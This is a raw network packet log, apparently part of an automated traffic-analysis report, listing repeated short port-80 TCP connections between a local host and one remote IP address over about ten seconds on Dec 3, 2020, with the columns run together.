                                    Dec 3, 2020 10:03:47.379466057 CET804993247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:47.379646063 CET4993280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.379678965 CET4993280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.396342039 CET804993247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:47.859765053 CET4993380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.876421928 CET804993347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:47.879686117 CET4993380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.887303114 CET4993380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.903973103 CET804993347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:47.904119968 CET4993380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.920607090 CET804993347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:47.950901031 CET804993347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:47.951071024 CET4993380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.951118946 CET4993380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:47.967735052 CET804993347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:48.423508883 CET4993480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:48.440094948 CET804993447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:48.440243006 CET4993480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:48.444667101 CET4993480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:48.461246014 CET804993447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:48.461489916 CET4993480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:48.477957964 CET804993447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:48.504371881 CET804993447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:48.504525900 CET4993480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:48.504745960 CET4993480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:48.521120071 CET804993447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:48.975821972 CET4993580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:48.992378950 CET804993547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:48.992574930 CET4993580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:48.999385118 CET4993580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.016041040 CET804993547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.016280890 CET4993580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.032902002 CET804993547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.146349907 CET804993547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.146480083 CET4993580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.146557093 CET4993580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.162921906 CET804993547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.370217085 CET4993680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.386748075 CET804993647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.386826992 CET4993680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.389664888 CET4993680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.406297922 CET804993647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.406409979 CET4993680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.422918081 CET804993647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.483880043 CET804993647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.483963013 CET4993680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.483994007 CET4993680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.500507116 CET804993647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.686940908 CET4993780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.703433037 CET804993747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.703577995 CET4993780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.706676960 CET4993780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.723197937 CET804993747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.723261118 CET4993780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.739713907 CET804993747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.772139072 CET804993747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:49.772232056 CET4993780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.772269964 CET4993780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:49.788798094 CET804993747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:50.321067095 CET4993880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.337776899 CET804993847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:50.337924004 CET4993880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.340955019 CET4993880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.357491016 CET804993847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:50.357599974 CET4993880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.374111891 CET804993847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:50.486013889 CET804993847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:50.486169100 CET4993880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.486195087 CET4993880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.502693892 CET804993847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:50.681174994 CET4993980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.697879076 CET804993947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:50.698012114 CET4993980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.701366901 CET4993980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.718024969 CET804993947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:50.718123913 CET4993980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.734693050 CET804993947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:50.762480021 CET804993947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:50.763031960 CET4993980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.763077974 CET4993980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:50.779700994 CET804993947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.213511944 CET4994180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.230046988 CET804994147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.230144024 CET4994180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.232876062 CET4994180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.249430895 CET804994147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.249530077 CET4994180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.266030073 CET804994147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.295295000 CET804994147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.295440912 CET4994180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.297743082 CET4994180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.314378023 CET804994147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.726125002 CET4994280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.742619991 CET804994247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.742757082 CET4994280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.745747089 CET4994280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.762496948 CET804994247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.762674093 CET4994280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.779164076 CET804994247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.805429935 CET804994247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.805613995 CET4994280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.805690050 CET4994280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:51.822074890 CET804994247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:51.991097927 CET4994480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.007761002 CET804994447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:52.007925987 CET4994480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.011532068 CET4994480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.028160095 CET804994447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:52.028239965 CET4994480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.044749975 CET804994447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:52.069458008 CET804994447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:52.069617987 CET4994480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.069665909 CET4994480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.086070061 CET804994447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:52.520464897 CET4994580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.537075043 CET804994547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:52.537303925 CET4994580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.540725946 CET4994580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.557357073 CET804994547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:52.557657003 CET4994580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.574111938 CET804994547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:52.673836946 CET804994547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:52.673985958 CET4994580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.674006939 CET4994580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:52.690522909 CET804994547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.111897945 CET4994680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.128487110 CET804994647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.128868103 CET4994680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.132189989 CET4994680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.148741007 CET804994647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.149421930 CET4994680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.165906906 CET804994647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.203316927 CET804994647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.203488111 CET4994680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.203519106 CET4994680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.220304012 CET804994647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.721308947 CET4994880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.737994909 CET804994847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.738178015 CET4994880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.741499901 CET4994880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.758074999 CET804994847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.758150101 CET4994880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.774662018 CET804994847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.800649881 CET804994847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.800916910 CET4994880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.801008940 CET4994880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:53.817473888 CET804994847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:53.992640972 CET4994980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.009260893 CET804994947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:54.010199070 CET4994980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.013312101 CET4994980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.029901028 CET804994947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:54.030227900 CET4994980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.046746969 CET804994947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:54.074157953 CET804994947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:54.074301004 CET4994980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.074346066 CET4994980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.090841055 CET804994947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:54.550339937 CET4995080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.566890955 CET804995047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:54.570141077 CET4995080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.573091984 CET4995080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.589555979 CET804995047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:54.590130091 CET4995080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.606615067 CET804995047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:54.632227898 CET804995047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:54.635296106 CET4995080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.635344028 CET4995080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:54.651968956 CET804995047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:55.135754108 CET4995180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.152493000 CET804995147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:55.152580976 CET4995180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.156588078 CET4995180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.173091888 CET804995147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:55.173185110 CET4995180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.189723015 CET804995147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:55.378946066 CET804995147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:55.379159927 CET4995180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.379360914 CET4995180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.395768881 CET804995147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:55.830847025 CET4995380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.847441912 CET804995347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:55.847573042 CET4995380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.853547096 CET4995380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.870038033 CET804995347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:55.870115995 CET4995380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.886662006 CET804995347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:55.913942099 CET804995347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:55.914032936 CET4995380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.914067984 CET4995380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:55.930563927 CET804995347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:56.094397068 CET4995480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.111139059 CET804995447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:56.111272097 CET4995480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.114180088 CET4995480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.130954027 CET804995447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:56.131055117 CET4995480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.147747040 CET804995447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:56.172661066 CET804995447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:56.172755003 CET4995480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.172815084 CET4995480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.189399958 CET804995447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:56.613373041 CET4995580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.630074978 CET804995547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:56.630167961 CET4995580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.633629084 CET4995580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.650232077 CET804995547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:56.650320053 CET4995580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.666866064 CET804995547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:56.693408966 CET804995547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:56.693507910 CET4995580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.693557978 CET4995580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:56.711678982 CET804995547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:57.129410028 CET4995680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.146101952 CET804995647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:57.146279097 CET4995680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.149827003 CET4995680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.166433096 CET804995647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:57.166579962 CET4995680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.183130980 CET804995647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:57.219338894 CET804995647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:57.219527006 CET4995680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.219650030 CET4995680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.236104012 CET804995647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:57.667649984 CET4995780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.684216976 CET804995747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:57.684330940 CET4995780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.692003012 CET4995780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.708735943 CET804995747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:57.708869934 CET4995780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.725378036 CET804995747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:57.753940105 CET804995747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:57.754085064 CET4995780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.754168034 CET4995780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:57.770615101 CET804995747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.261950970 CET4995880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.278537035 CET804995847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.278654099 CET4995880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.283328056 CET4995880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.300075054 CET804995847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.300215960 CET4995880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.316709042 CET804995847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.343101978 CET804995847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.343250990 CET4995880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.343416929 CET4995880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.359910011 CET804995847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.528562069 CET4995980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.545061111 CET804995947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.545171976 CET4995980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.547962904 CET4995980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.564430952 CET804995947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.564587116 CET4995980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.580955982 CET804995947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.604918957 CET804995947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.605074883 CET4995980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.605142117 CET4995980192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.621527910 CET804995947.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.797276020 CET4996080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.814898014 CET804996047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.815073967 CET4996080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.821964979 CET4996080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.838479996 CET804996047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.838589907 CET4996080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.855214119 CET804996047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.886666059 CET804996047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:58.886872053 CET4996080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.886924982 CET4996080192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:58.904994965 CET804996047.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.077979088 CET4996180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.094481945 CET804996147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.094568968 CET4996180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.097645998 CET4996180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.114094973 CET804996147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.114182949 CET4996180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.130697012 CET804996147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.154859066 CET804996147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.154963970 CET4996180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.155005932 CET4996180192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.172489882 CET804996147.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.354834080 CET4996280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.371468067 CET804996247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.371733904 CET4996280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.376610041 CET4996280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.393172979 CET804996247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.393301010 CET4996280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.409849882 CET804996247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.446842909 CET804996247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.446954966 CET4996280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.447029114 CET4996280192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.463623047 CET804996247.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.637569904 CET4996380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.654194117 CET804996347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.654318094 CET4996380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.658098936 CET4996380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.674735069 CET804996347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.674897909 CET4996380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.691452980 CET804996347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.717549086 CET804996347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.717643976 CET4996380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.717894077 CET4996380192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.734380007 CET804996347.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.917570114 CET4996480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.934082985 CET804996447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.934166908 CET4996480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.937166929 CET4996480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.953639984 CET804996447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.953744888 CET4996480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.970134020 CET804996447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.996310949 CET804996447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:03:59.996500015 CET4996480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:03:59.996524096 CET4996480192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.016834021 CET804996447.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.193739891 CET4996580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.210196972 CET804996547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.210311890 CET4996580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.213593960 CET4996580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.229998112 CET804996547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.230097055 CET4996580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.246563911 CET804996547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.271773100 CET804996547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.271874905 CET4996580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.271913052 CET4996580192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.288340092 CET804996547.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.486182928 CET4996680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.502691031 CET804996647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.502779961 CET4996680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.506449938 CET4996680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.522922039 CET804996647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.523019075 CET4996680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.539506912 CET804996647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.568294048 CET804996647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.568418980 CET4996680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.568460941 CET4996680192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.584884882 CET804996647.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.767812967 CET4996780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.784431934 CET804996747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.784554005 CET4996780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.791546106 CET4996780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.808123112 CET804996747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.808204889 CET4996780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.824769020 CET804996747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.944044113 CET804996747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:00.944178104 CET4996780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.944247007 CET4996780192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:00.960671902 CET804996747.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:01.145394087 CET4996880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:01.161969900 CET804996847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:01.162070036 CET4996880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:01.165537119 CET4996880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:01.182163954 CET804996847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:01.182256937 CET4996880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:01.198846102 CET804996847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:01.224257946 CET804996847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:01.224359035 CET4996880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:01.224402905 CET4996880192.168.2.347.91.79.163
                                    Dec 3, 2020 10:04:01.241770029 CET804996847.91.79.163192.168.2.3
                                    Dec 3, 2020 10:04:01.451548100 CET4996980192.168.2.347.91.79.163
